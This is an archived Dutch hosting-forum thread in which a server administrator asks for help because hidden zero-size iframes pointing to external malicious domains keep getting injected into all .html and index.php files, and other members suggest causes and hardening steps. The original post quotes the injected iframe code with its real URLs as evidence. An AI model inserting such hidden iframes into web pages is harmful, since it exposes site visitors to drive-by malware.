PDA

Bekijk Volledige Versie : Beveilling mislukt (virus )



Dotdns
11/09/06, 21:04
Wie weet hier raad
Firewall , security , dagelijks andere pswd
Niets , maar dan ook niets help...

telkens alles schoon gemaakt wordt , worden eerst alle .html bestanden aangepakt.
op het einde van elke html , komt dit
NIET AANKLIKKEN aub

</html>

<iframe height="0" width="0" src="http://securitycash.info/main.php"></iframe><iframe src="http://voland.gostns.org/go.php" width=1 height=1></iframe>

Of bij de index.php ( hier enkel op index , geen andere php files
NIET AANKLIKKEN aub

</html>

<iframe name="3" src="http://voland-rocker.fatal.ru/fr.htm" width=1 height=1 style="display:none"></iframe><iframe height="0" width="0" src="http://securitycash.info/main.php"></iframe>

Wie heeft ervaring hierbij..??
Heel de server wordt er telkens aangepakt ( Cpanel )
De andere servers (DA / Plesk ) hebben geen last erbij

In geen ene logs files , wordt er iets gevonden van enige login via ssh of dergelijk. geen scripten gevonden niets .... :huh:
Users zijn 1 per 1 verhuisd naar een DA panel
( na alle files hebben schoongemaakt ->| )

Het is onbegrijpelijk hoe dit kan.....
Wie weet raad

gjtje
11/09/06, 21:11
Server opnieuw geinstalleerd nadat je wat had gevonden?

Dotdns
11/09/06, 21:15
Yeps ,

op 2 maanden tijd , is dit het 3de keer van een fresh install

smurf
11/09/06, 22:02
Is de owner van de files apache of de user van de sites.

Is het apache... ja dan is het duidelijk dan is de code geinjecteerd via een script.

Is het de user... kijk eens je ftp logs na:

Kijk via het commando 'last' of je geen logins hebt gehad vanop hetzelfde ip voor verschillende logins... Indien dat het geval is dan zijn je wachtwoorden ergens gesniffed geweest.

Enige oplossing is dan zo snel mogelijk alle FTP wachtwoorden wijzigen en zoeken hoe de wachtwoorden achterhaald zijn (Brute force, kernel expoit...)

Dotdns
11/09/06, 22:12
Het is apache ,
via user, sta er nog maar 1tje erop zijn er de laatste 20 dagen geen ftp login
Logs worden dagelijks gecontroleerd. ( leeg ) ( ik maakte toch even een test, en als ik inlog komt wel in logs )
Script bruteforce staat op on en de mails/logs zijn ook leeg.
SSH controle via E-mail Alert on Root (http://www.webhostgear.com/43.html) werkt perfect.
Dus wel via script ergens maar waar .
3 fresh install , telkens wordt alles gecontroleerd, en niets..
(laatste was zelf phpmyadmin geinfecteerd) als maar index.php en .html is...

Wordt er crazy van ....
cpanel virus scanning zeg ook niets

smurf
11/09/06, 23:28
In principe zouden de bestanden niet onder apache mogen staan.

Er zal wel ergens een lekke installatie staan waar apache een perl of php script draait die files zoekt met apache of world readable permissies en dan de iframes injecteert in de pagina.

Is normaal op te lappen door suPHP of iets dergelijks te draaien zodat dat in principe niet kan. Een exploit kan dan nog wel voorkomen maar zal zich beperken tot de gebruiker die gexploited werd. Op http://eth0.us kan je wat basic security zaken vinden.

_arno_
11/09/06, 23:37
Neem inderdaad aan dat er ergens een gruwelijk lekke website is, al eens alle pakketten gecheckt of deze geupdate zijn?
denk daarbij bv aan phpbb joomla of andere programmatjes :)

Succes verder!

V. Kleijnendorst
12/09/06, 00:00
Check via SSH eens naar de laatste 50 FTP logins
(en doe een google search op een gebruikt wachtwoord)

Ik heb precies hetzelfde gehad. Na verhuizing van een lekke server naar een goed beveiligde server bleken de wachtwoorden van klanten op een aantal websites te staan en werd er elk aantal minuten ingelogd op FTP om alle files aan te passen. Wachtwoorden wijzigen was de enige juiste oplossing.

Edit: niet goed gelezen. Geen FTP logins?
code is precies hetzelfde als het bij mij was.

klasje.be
12/09/06, 21:24
Shell injectie?
Safe mode opzetten in php & mysql!
Test mss eens mod_suid (mod_guid?)
Dan kunnen ze enkel bij hun eigen bestanden.
Probeer ook eens om bv 2 dagen Cpanel te disablen, en kijk of het nog gebeurt.
Ga alles af tot het wijzigen van de indexen niet meer gebeurt.
Debug je server :p

Offtopic: last geeft bij mij een lijst van miljoenen dingen...
Waar kan ik die eens legen?

_arno_
13/09/06, 00:52
Heb je al eens wat zoekwerk geleverd op de betreffende urls waar misschien bijstaat hoe deze binnenkomen. Zo weet je in ieder geval waar je moet zoeken.

Dotdns
13/09/06, 13:21
Shell injectie?
Safe mode opzetten in php & mysql!
Test mss eens mod_suid (mod_guid?)
Dan kunnen ze enkel bij hun eigen bestanden.
Probeer ook eens om bv 2 dagen Cpanel te disablen, en kijk of het nog gebeurt.
Ga alles af tot het wijzigen van de indexen niet meer gebeurt.
Debug je server :p

Cpanel is al enige tijd AF
Safe mode was Off , heb nu even aan gezet
mod_guid getest zonder resultaat
het gaat enkel om de index bestanden.

Er staat nog 1 gebruiker erop dat dagelijks zijn ww veranderd.
er staan nog wel 3 a 4 site ( offline suspended ) erop, zonder phbb/jomla enz...
enkele html bestanden en dat is al.
Maar het zijn niet de files van 1 user, maar van alle users ( zelf de suspended )
Files dat niet van user zijn , maar van de server zelf.
ww server wordt ook dagelijks gewijzig.
Ftp logins blijven leeg :S

onbegrijpelijk.
Thx voor de hulp.

sander
13/09/06, 14:29
waarschijnlijk via een lek script , je kernel exploited, achterduurtje erin gezet etc etc..

reinstall, huur iemand in die verstand heeft van zaken en laat die je systeem beveiligen up2date brengen.